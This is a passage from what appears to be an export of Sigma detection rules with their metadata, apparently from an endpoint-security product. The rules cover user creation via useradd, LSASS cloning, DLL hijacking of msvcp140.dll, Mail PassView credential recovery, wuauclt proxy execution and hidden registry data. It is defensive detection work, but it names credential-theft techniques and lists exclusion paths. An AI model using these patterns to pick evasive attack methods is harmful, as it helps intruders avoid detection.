'/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n\n exclusion_edutice:\n # useradd -p -s /bin/bash -b /home/external -g edutice-external -m --badname\n - ProcessCommandLine|contains: ' -g edutice-external '\n ProcessGrandparentCommandLine: '/usr/bin/python3 /usr/lib/edutice/service/main.py'\n - ProcessCommandLine|contains: ' -g edutice-external '\n ProcessParentCommandLine: '/usr/bin/python3 /usr/lib/edutice/service/main.py'\n\n exclusion_containers:\n Ancestors|contains:\n - '/usr/bin/podman'\n - '/usr/bin/containerd-shim'\n - '/usr/bin/containerd-shim-runc-v2'\n - '/usr/bin/dockerd'\n - '/usr/sbin/dockerd'\n - '/usr/local/bin/dockerd'\n - '/usr/local/bin/docker-init'\n - '/usr/bin/dockerd-current'\n - '/usr/sbin/dockerd-current'\n - '/usr/bin/containerd'\n - '/usr/local/bin/containerd'\n - '/var/lib/rancher/k3s/data/*/bin/containerd'\n - '/var/lib/rancher/rke2/data/*/bin/containerd'\n - '/snap/docker/*/bin/dockerd'\n - '/snap/microk8s/*/bin/containerd'\n - '/usr/bin/dockerd-ce'\n\n condition: selection and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "00ecf213-801a-4ee0-b19d-fbe12001d4a3", "rule_name": "User Created via useradd", "rule_description": "Detects an attempt to create a new user using the useradd utility.\nAdversaries may create new users to hide their activity or achieve persistence.\nIt is recommended to investigate whether the process has legitimate reasons to create a user as well as to look for possible suspicious activities on the host.\n", "rule_creation_date": "2023-01-03", "rule_modified_date": "2026-03-23", "rule_os": "linux", "rule_status": null, "rule_tactic_tags": [ "attack.persistence" ], "rule_technique_tags": [ "attack.t1136.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "00ff5814-36a0-4bb9-8426-599b30b414a1", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "critical", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.094659Z", "creation_date": "2026-03-23T11:45:34.094661Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.094665Z", "rule_level": "critical", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://github.com/deepinstinct/Dirty-Vanity", "https://gist.github.com/GeneralTesler/68903f7eb00f047d32a4d6c55da5a05c", "https://attack.mitre.org/techniques/T1055/" ], "name": "t1003_001_lsass_clone_using_process_reflection.yml", "content": "title: Possible LSASS Reflection via Windows Fork API\nid: 00ff5814-36a0-4bb9-8426-599b30b414a1\ndescription: |\n Detects the reflection of a Windows process using the Windows fork API.\n Attackers can use process forking to inject processes with shellcodes while evading detection since the modified process is the cloned one.\n This technique can be used to hide malicious tasks inside legitimate processes as well as silently dump LSASS' memory for credential access and privilege escalation.\n It is recommended to investigate the process that performed this action to determine its legitimacy.\nreferences:\n - https://github.com/deepinstinct/Dirty-Vanity\n - https://gist.github.com/GeneralTesler/68903f7eb00f047d32a4d6c55da5a05c\n - https://attack.mitre.org/techniques/T1055/\ndate: 2023/01/04\nmodified: 2025/01/31\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1055\n - attack.credential_access\n - attack.t1003.001\n - classification.Windows.Source.Thread\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.LSASSAccess\nlogsource:\n product: windows\n category: remote_thread\ndetection:\n selection:\n TargetImage|endswith: '\\lsass.exe'\n StartFunction|contains: 'RtlCreateProcessReflection'\n\n exclusion_werfault:\n ProcessImage:\n - '?:\\Windows\\System32\\WerFault.exe'\n - '?:\\Windows\\syswow64\\WerFault.exe'\n ProcessParentCommandLine: '?:\\Windows\\System32\\svchost.exe -k WerSvcGroup'\n\n exclusion_rdrleakdiag:\n # C:\\WINDOWS\\system32\\RdrLeakDiag.exe -p 10768 -h 25 -tp 2 -cleanup -watson -unnamed -wait 240\n ProcessImage:\n - '?:\\Windows\\System32\\rdrleakdiag.exe'\n - '?:\\Windows\\syswow64\\rdrleakdiag.exe'\n ProcessCommandLine|contains|all:\n - 'RdrLeakDiag.exe'\n - '-cleanup'\n - '-watson'\n - '-unnamed'\n\n condition: selection and not 1 of exclusion_*\nlevel: critical\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "00ff5814-36a0-4bb9-8426-599b30b414a1", "rule_name": "Possible LSASS Reflection via Windows Fork API", "rule_description": "Detects the reflection of a Windows process using the Windows fork API.\nAttackers can use process forking to inject processes with shellcodes while evading detection since the modified process is the cloned one.\nThis technique can be used to hide malicious tasks inside legitimate processes as well as silently dump LSASS' memory for credential access and privilege escalation.\nIt is recommended to investigate the process that performed this action to determine its legitimacy.\n", "rule_creation_date": "2023-01-04", "rule_modified_date": "2025-01-31", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.credential_access", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1003.001", "attack.t1055" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "01198d94-cc61-455c-9bd1-37096dd366f1", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.623301Z", "creation_date": "2026-03-23T11:45:34.623303Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.623307Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.elastic.co/security-labs/unmasking-financial-services-intrusion-ref0657", "https://learn.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_unsigned_msvcp140.yml", "content": "title: Unsigned msvcp140.dll DLL Loaded\nid: 01198d94-cc61-455c-9bd1-37096dd366f1\ndescription: |\n Detects a suspicious unsigned DLL named 'msvcp140.dll' loaded by a process that could be the target to DLL hijacking.\n Adversaries may execute their own malicious payloads by planting a DLL in a specific path to exploit the Windows DLL search order.\n It is recommended to investigate the behavior of the process loading the DLL to identify any suspicious activity, as well as to analyze the DLL itself for malicious content.\nreferences:\n - https://www.elastic.co/security-labs/unmasking-financial-services-intrusion-ref0657\n - https://learn.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2024/07/23\nmodified: 2026/02/10\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ImageLoaded|endswith: '\\msvcp140.dll'\n sha256|contains: '?' # at least one character, some SHA256 are empty\n\n filter_signed:\n Signed: 'true'\n\n filter_commonfolders:\n ImageLoaded|startswith:\n - '?:\\Windows\\WinSxS\\'\n - '?:\\Windows\\System32\\DriverStore\\'\n - '?:\\Windows\\System32\\msvcp140.dll'\n - '?:\\Windows\\syswow64\\msvcp140.dll'\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n filter_known_sha256:\n sha256:\n - '1e57a6df9e3742e31a1c6d9bff81ebeeae8a7de3b45a26e5079d5e1cce54cd98'\n - 'f7ba518cb961853ec35c7bb159054983fc006fdfbb6b1c360720eb52fefb3d38'\n - 'b7278da3da769bff80ecf19d0f36ad1716da7f6c77f625c08d185ad302b200d0'\n - 'ef27a68bdc1ee3d5d9a6a720b656bfb7604a8fac6aceb245a6eadc2788686d9f'\n - '557d76338488e28c7761dfe5ee4fa722f65f0c945563002e86de09c95f02b2aa'\n - '75fc76655631a4ae72d015b8e85f899537c603661ca35a3f29099b8e4c84716c'\n - '74892d9b4028c05debaf0b9b5d9dc6d22f7956fa7d7eee00c681318c26792823'\n - '87a9e61e428632177c0292390d125da8e5c996cc0d1d619045ee041ce3bd9147'\n - '9e16ea4679e3c5780b2fdeea251e258bef968631137a40f93fcad6ee551108df'\n - 'd3151f653af88d88994dd66e30e3a184ba347e57a7c3ca909c2a9d4b5b6084fc'\n - '875f236424f59a82c9311930097c7e6073242fee66a60c38eec79b827d6e924c'\n - '006a73b6c5b31cc85974873a694e81e3d213ec493323b04607bcdaba0d6115eb'\n - '85aa8c8ab4cbf1ff9ae5c7bde1bf6da2e18a570e36e2d870b88536b8658c5ba8'\n - '115327d2c7fe87aa39a32bf3fd27e3cff32b9f4bb80f31e426b30148820aa220'\n - 'b9e8377a03ef104122a416f968b05133739f2f2a6c4b83c190723d7d780ebad3'\n - 'c09b126e7d4c1e6efb3ffcda2358252ce37383572c78e56ca97497a7f7c793e4'\n - '65ee0e7864cc6b2d8fd81b4cdf32bc900b74fdf04149587a8987f11f57966c86'\n - 'e7f59bc871613f960e61aa111ceb2f6de0650f79878d9e2141c646a51bdf97b0'\n - '8bd47bbc5cf773fa44ba38a20dbd3353970353cb99eda9238e4af92383fab8f9'\n\n filter_knownimphash:\n Imphash:\n - '2ba11fd5a511c8a409e705e9ab6b5dc1'\n - 'adf99b9ea3a1f76c33522f96772bc4dd'\n - 'a14a54183892ac75415d5e2bb2ac7208'\n - '01c801a34c4715440ef1f25ad689b315'\n - '54c174302c3213f3e59e692f8b5c58e5'\n - 'f2d585ff96afa3a77e09f5b37e7b3230'\n - 'c0e775d13a8146396b3de4dc441694a7'\n\n exclusion_programfiles:\n Image|startswith:\n - '?:\\Program Files (x86)\\'\n - '?:\\Program Files\\'\n\n exclusion_spool:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\x64\\3\\msvcp140.dll'\n\n exclusion_java: # too many java process with unpredictable name..\n ImageLoaded|endswith: '\\bin\\msvcp140.dll'\n\n exclusion_zotero:\n ProcessImage|endswith: '\\Zotero*\\zotero.exe'\n ImageLoaded: '?:\\Users\\\\*\\AppData\\Local\\Zotero\\msvcp140.dll'\n\n exclusion_ideashare:\n ProcessImage:\n - '?:\\Users\\\\*\\AppData\\Local\\IdeaShare\\IdeaShare.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\IdeaShare\\IdeaShareService.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\IdeaShareKey\\IdeaShareService.exe'\n - '?:\\ProgramData\\IdeaShare\\IdeaShare.exe'\n ImageLoaded:\n - '?:\\Users\\\\*\\AppData\\Local\\IdeaShareKey\\msvcp140.dll'\n - '?:\\Users\\\\*\\AppData\\Local\\IdeaShare\\msvcp140.dll'\n - '?:\\ProgramData\\IdeaShare\\msvcp140.dll'\n\n exclusion_werfault:\n ProcessImage:\n - '?:\\Windows\\SysWOW64\\WerFault.exe'\n - '?:\\Windows\\system32\\WerFault.exe'\n\n exclusion_teams:\n - ProcessImage: '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\Teams\\current\\Teams.exe'\n ImageLoaded: '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\Teams\\current\\msvcp140.dll'\n - ProcessName: 'regsvr32.exe'\n ImageLoaded: '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\TeamsMeetingAddin\\\\*\\\\*\\msvcp140.dll'\n\n exclusion_onedrive:\n ImageLoaded: '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\OneDrive\\\\*\\msvcp140.dll'\n ProcessImage:\n - '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\OneDrive\\\\*\\Microsoft.SharePoint.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\OneDrive\\\\*\\FileSyncConfig.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\OneDrive\\\\*\\FileCoAuth.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\OneDrive\\\\*\\OneDriveLauncher.exe'\n\n exclusion_sap:\n ProcessImage|endswith: '\\DATA_UNITS\\CrystalReports\\setup.engine\\actionagentproc.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'SAP SE'\n\n exclusion_sonix:\n ProcessCommandLine: '?:\\WINDOWS\\System32\\svchost.exe -k Camera -s FrameServer'\n ImageLoaded: '?:\\Windows\\System32\\SONiX\\msvcp140.dll'\n\n exclusion_cisco:\n ImageLoaded: '?:\\Users\\\\*\\AppData\\Local\\CiscoSparkLauncher\\\\*\\dependencies\\msvcp140.dll'\n ProcessImage:\n - '?:\\Users\\\\*\\AppData\\Local\\CiscoSparkLauncher\\\\*\\dependencies\\wmlhost.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\CiscoSparkLauncher\\CiscoCollabHost.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "01198d94-cc61-455c-9bd1-37096dd366f1", "rule_name": "Unsigned msvcp140.dll DLL Loaded", "rule_description": "Detects a suspicious unsigned DLL named 'msvcp140.dll' loaded by a process that could be the target to DLL hijacking.\nAdversaries may execute their own malicious payloads by planting a DLL in a specific path to exploit the Windows DLL search order.\nIt is recommended to investigate the behavior of the process loading the DLL to identify any suspicious activity, as well as to analyze the DLL itself for malicious content.\n", "rule_creation_date": "2024-07-23", "rule_modified_date": "2026-02-10", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "01474426-6a8b-4834-9f6f-54b7c359a027", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "medium", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.077917Z", "creation_date": "2026-03-23T11:45:34.077919Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.077924Z", "rule_level": "medium", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.nirsoft.net/utils/mailpv.html", "https://attack.mitre.org/techniques/T1555/" ], "name": "t1555_mail_passview_execution.yml", "content": "title: Mail PassView Execution\nid: 01474426-6a8b-4834-9f6f-54b7c359a027\ndescription: |\n Detects the execution of Mail PassView, a NirSoft utility allowing users to retrieve passwords from many mail clients.\n It can be used by attackers to get the mail passwords in an infected hosts.\n It is recommended to investigate the actions that were performed by Mail PassView as well as Mail PassView's execution context to determine its legitimacy.\nreferences:\n - https://www.nirsoft.net/utils/mailpv.html\n - https://attack.mitre.org/techniques/T1555/\ndate: 2025/10/31\nmodified: 2025/11/04\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1555\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.MailPassView\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n - Image|endswith: '\\mailpv.exe'\n # No OrginalFilename, we have to rely on another PE field\n # The two spaces are intentional\n - Product: 'Email Password-Recovery'\n\n condition: selection\nlevel: medium\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "01474426-6a8b-4834-9f6f-54b7c359a027", "rule_name": "Mail PassView Execution", "rule_description": "Detects the execution of Mail PassView, a NirSoft utility allowing users to retrieve passwords from many mail clients.\nIt can be used by attackers to get the mail passwords in an infected hosts.\nIt is recommended to investigate the actions that were performed by Mail PassView as well as Mail PassView's execution context to determine its legitimacy.\n", "rule_creation_date": "2025-10-31", "rule_modified_date": "2025-11-04", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.credential_access" ], "rule_technique_tags": [ "attack.t1555" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "016b5935-600b-4242-91e1-e727c9410d11", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.070359Z", "creation_date": "2026-03-23T11:45:34.070361Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.070365Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://lolbas-project.github.io/lolbas/Binaries/Wuauclt/", "https://attack.mitre.org/techniques/T1218/" ], "name": "t1218_wuauctl.yml", "content": "title: Proxy Execution via Wuauclt\nid: 016b5935-600b-4242-91e1-e727c9410d11\ndescription: |\n Detects the execution of wuauclt.exe as a legitimate binary proxy for System Binary Proxy Execution.\n Malicious actors may exploit wuauclt.exe to execute arbitrary DLLs, evading detection by leveraging trusted system binaries.\n It is recommended to investigate the process and parameters of wuauclt.exe execution, analyze the DLL for malicious content, and ensure that any executed code aligns with legitimate system operations.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Wuauclt/\n - https://attack.mitre.org/techniques/T1218/\ndate: 2022/11/17\nmodified: 2025/02/20\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Wuauclt\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\wuauclt.exe'\n - OriginalFileName: 'wuauclt.exe'\n\n selection_commandline:\n CommandLine|contains|all:\n - 'UpdateDeploymentProvider'\n - 'RunHandlerComServer'\n\n exclusion_legitimate:\n CommandLine|contains:\n - ' UpdateDeploymentProvider.dll '\n - ' wuaueng.dll '\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "016b5935-600b-4242-91e1-e727c9410d11", "rule_name": "Proxy Execution via Wuauclt", "rule_description": "Detects the execution of wuauclt.exe as a legitimate binary proxy for System Binary Proxy Execution.\nMalicious actors may exploit wuauclt.exe to execute arbitrary DLLs, evading detection by leveraging trusted system binaries.\nIt is recommended to investigate the process and parameters of wuauclt.exe execution, analyze the DLL for malicious content, and ensure that any executed code aligns with legitimate system operations.\n", "rule_creation_date": "2022-11-17", "rule_modified_date": "2025-02-20", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion" ], "rule_technique_tags": [ "attack.t1218" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "01833e69-127a-4ff4-a998-d4decbae548f", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "moderate", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.069505Z", "creation_date": "2026-03-23T11:45:34.069507Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.069512Z", "rule_level": "high", "rule_confidence": "moderate", "rule_confidence_override": null, "references": [ "https://attack.mitre.org/techniques/T1112/" ], "name": "t1112_hidden_registry_data_space.yml", "content": "title: Possible Hidden Registry Data Created\nid: 01833e69-127a-4ff4-a998-d4decbae548f\ndescription: |\n Detects an attempt to hide data in the Registry by adding multiple spaces at the beginning of a value.\n Adversaries often manipulate the Windows Registry by adding spaces to obscure data, hide configurations, or remove evidence.\n It is recommended to investigate the source of the registry modification, and check for related events that may indicate unauthorized access or malicious activity.\nreferences:\n - https://attack.mitre.org/techniques/T1112/\ndate: 2021/10/08\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n Details|startswith: ' '\n\n # Some softwares set values containing only a random number of spaces\n exclusion_all_spaces:\n Details|startswith: ' '\n Details|endswith: ' '\n\n exclusion_image:\n Image:\n - '?:\\Program Files (x86)\\Avid\\iNEWS*\\ANWS.exe'\n - '?:\\Windows\\System32\\drivers\\Intel\\ICPS\\IntelConnect.exe'\n - '?:\\Program Files\\Photon Engineering\\FRED *\\Bin\\Fred.exe'\n - '?:\\Program Files (x86)\\Thermo\\Avantage\\Bin\\Avantage.exe'\n - '?:\\program files\\thermo scientific\\avantage\\bin\\avantage.exe'\n\n exclusion_commandline:\n Image: '?:\\windows\\system32\\regsvr32.exe'\n ProcessCommandLine:\n - '/s ?:\\program files\\thermo scientific\\avantage\\bin\\xraygun.ocx'\n - '/s ?:\\program files\\thermo scientific\\avantage\\bin\\xraygun_??????.ocx'\n - '/s ?:\\program files\\thermo scientific\\avantage\\bin\\vgchargecompensation.ocx'\n\n exclusion_tiworker:\n Image|endswith: '\\TiWorker.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n exclusion_windowsupdatebox:\n ProcessParentImage|endswith:\n - '\\WindowsUpdateBox.exe'\n - ':\\$WINDOWS.~BT\\Sources\\setuphost.exe'\n - '\\TiWorker.exe'\n - '\\Sources\\SetupPrep.exe'\n TargetObject|endswith: '\\Microsoft\\Windows\\CurrentVersion\\WSMAN\\Plugin\\Microsoft.Windows.ServerManagerWorkflows\\ConfigXML'\n Details|contains|all:\n - 'PlugInConfiguration'\n - 'PublicKeyToken'\n - 'MaxConcurrentCommandsPerShell'\n\n exclusion_adobe:\n Image|endswith:\n - '\\AcroRd32.exe'\n - '\\Acrobat.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Adobe Inc.'\n - 'Adobe Systems, Incorporated'\n TargetObject|endswith:\n # - '\\Software\\Adobe\\Acrobat Reader\\DC\\SessionManagement\\cWindowsPrev\\cWin0\\cTab*\\tfilename'\n # - '\\Software\\Adobe\\Acrobat Reader\\DC\\SessionManagement\\cWindowsCurrent\\cWin0\\cTab*\\tfilename'\n # - '\\SOFTWARE\\Adobe\\Acrobat Reader\\2017\\AVGeneral\\cRecentFiles\\c8\\tFileName'\n - '\\SOFTWARE\\Adobe\\Acrobat Reader\\\\*\\tfilename'\n - '\\SOFTWARE\\Adobe\\Adobe Acrobat\\\\*\\tfilename'\n\n exclusion_jalios:\n Image: '?:\\Program Files (x86)\\Jalios\\Jalios JDrive\\srm.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'JALIOS'\n Details|contains:\n - '__AChangedOverlay'\n - '__ASynchronizedOverlay'\n - '__APrivateOverlay'\n - '__ATBUOverlay'\n - '__ALockedOverlay'\n\n exclusion_setuphost:\n Image: '?:\\$WINDOWS.~BT\\Sources\\setuphost.exe'\n TargetObject:\n - 'HKLM\\$OFFLINE_RW_????????$SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Shell Extensions\\Approved\\{????????-????-????-????-????????????}'\n - 'HKLM\\$OFFLINE_RW_????????$SOFTWARE\\Classes\\CLSID\\{????????-????-????-????-????????????}\\(Default)'\n Details|contains:\n - '__AChangedOverlay'\n - '__ASynchronizedOverlay'\n - '__APrivateOverlay'\n - '__ATBUOverlay'\n - '__ALockedOverlay'\n\n exclusion_wsman:\n Image: '?:\\Windows\\System32\\WSManHTTPConfig.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN\\Migration\\Plugin\\Microsoft.Windows.ServerManagerWorkflows\\ConfigXML'\n\n exclusion_sap:\n Image:\n - '?:\\Program Files (x86)\\SAP\\FrontEnd\\SAPgui\\saplogon.exe'\n - '?:\\Program Files (x86)\\SAP\\FrontEnd\\SAPGUI\\saplgpad.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'SAP SE'\n\n exclusion_pdf_architect:\n Image: '?:\\Program Files\\PDF Architect ?\\architect.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'pdfforge GmbH'\n\n exclusion_smbios2reg:\n Image|endswith: '\\BeetleInfo\\Smbios2Reg.exe'\n ProcessOriginalFileName: 'Smbios2Reg.exe'\n TargetObject: 'HKLM\\SOFTWARE\\Wincor Nixdorf\\BeetleInfo SensorService\\DMI\\Mainboard'\n\n exclusion_notepad:\n Image:\n - '?:\\Windows\\System32\\notepad.exe'\n - '?:\\Windows\\SysWOW64\\notepad.exe'\n TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Notepad\\\\*String'\n\n exclusion_ssms:\n Image: '?:\\Program Files (x86)\\Microsoft SQL Server Management Studio *\\Common7\\IDE\\Ssms.exe'\n TargetObject|endswith:\n - '\\SOFTWARE\\Microsoft\\SQL Server Management Studio\\\\*_IsoShell\\Find\\Find'\n - '\\SOFTWARE\\Microsoft\\SQL Server Management Studio\\\\*_IsoShell\\Find\\Find *'\n\n exclusion_softerra:\n Image|endswith: '\\ldapbrowser.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Softerra, Ltd.'\n TargetObject|endswith: '\\SOFTWARE\\Softerra\\LDAP Browser *\\Settings\\QuickSearchBar\\\\*'\n\n exclusion_acdsystems:\n Image|endswith: '\\ACDSee??.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'ACD Systems International Inc'\n TargetObject|endswith: '\\SOFTWARE\\ACD Systems\\ACDSee\\\\*\\PrintOptions\\Presets\\PrintContactSheet\\Default\\strFtrText'\n\n exclusion_outlook:\n ProcessOriginalFileName: 'Outlook.exe'\n TargetObject:\n - 'HKU\\S-*\\SOFTWARE\\Microsoft\\Office\\\\*\\Outlook\\Profiles\\Outlook\\\\*\\Reply-Forward Signature'\n - 'HKU\\S-*\\SOFTWARE\\Microsoft\\Office\\\\*\\Outlook\\Profiles\\Outlook\\\\*\\New Signature'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\n#level: medium\nconfidence: moderate\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "01833e69-127a-4ff4-a998-d4decbae548f", "rule_name": "Possible Hidden Registry Data Created", "rule_description": "Detects an attempt to hide data in the Registry by adding multiple spaces at the beginning of a value.\nAdversaries often manipulate the Windows Registry by adding spaces to obscure data, hide configurations, or remove evidence.\nIt is recommended to investigate the source of the registry modification, and check for related events that may indicate unauthorized access or malicious activity.\n", "rule_creation_date": "2021-10-08", "rule_modified_date": "2025-04-15", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion" ], "rule_technique_tags": [ 